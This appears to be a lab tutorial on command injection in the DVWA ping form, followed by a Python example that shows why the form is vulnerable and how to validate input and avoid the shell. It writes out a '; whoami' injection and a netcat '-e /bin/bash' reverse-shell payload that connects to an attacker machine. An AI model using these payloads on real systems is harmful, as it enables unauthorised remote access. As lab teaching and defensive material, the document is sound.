- Consider a website that pings an IP address or domain name that you enter, e.g. the website below pings whatever IP address or domain is entered.
Log in to OWASP and click on Damn Vulnerable Web Application.
You would be re-directed to DVWA's login page.
Type in a sample command such as whoami after a semicolon (;), as below.
In the result, you see the output of both commands, i.e. ping and whoami.
- We can try to make a connection from DVWA's machine to our Kali Linux machine. This can be done using netcat, which is used to connect two PCs. Typing the following command would allow us to connect to the victim's machine:
<your-ip-address>;nc.traditional -e bin/bash <ip-address-of-machine-to-which-you-want-to-connect>
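
Why the ping form above runs a second command, and how a handler can refuse it, shown as an added example that is not DVWA's own code. The function names, the `-c 4` ping count and the sample inputs are assumptions made for illustration.

```python
import ipaddress
import re
import subprocess

# One DNS label: letters, digits, inner hyphens; never starts or ends with "-".
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def vulnerable_command(target: str) -> str:
    """The string a naive handler hands to the shell: input pasted in as-is.
    A ';' in target ends the ping command and starts a second one."""
    return "ping -c 4 " + target


def validate_target(target: str) -> str:
    """Accept only an IP address literal or a plain hostname; raise otherwise."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if len(target) <= 253 and _HOSTNAME.fullmatch(target):
        return target
    raise ValueError(f"rejected ping target: {target!r}")


def safe_argv(target: str) -> list:
    """Argument vector for ping. No shell parses it, so ';' has no meaning,
    and validation keeps a leading '-' from being read as a ping option."""
    return ["ping", "-c", "4", validate_target(target)]


def ping(target: str) -> str:
    """Run ping without a shell and return its output."""
    result = subprocess.run(safe_argv(target), capture_output=True,
                            text=True, timeout=15, check=False)
    return result.stdout


if __name__ == "__main__":
    # Constructed sample inputs: two legitimate targets and the page's payload.
    for sample in ["127.0.0.1", "example.com", "127.0.0.1; whoami"]:
        print("shell would see:", vulnerable_command(sample))
        try:
            print("safe argv      :", safe_argv(sample))
        except ValueError as err:
            print("safe handler   :", err)
```
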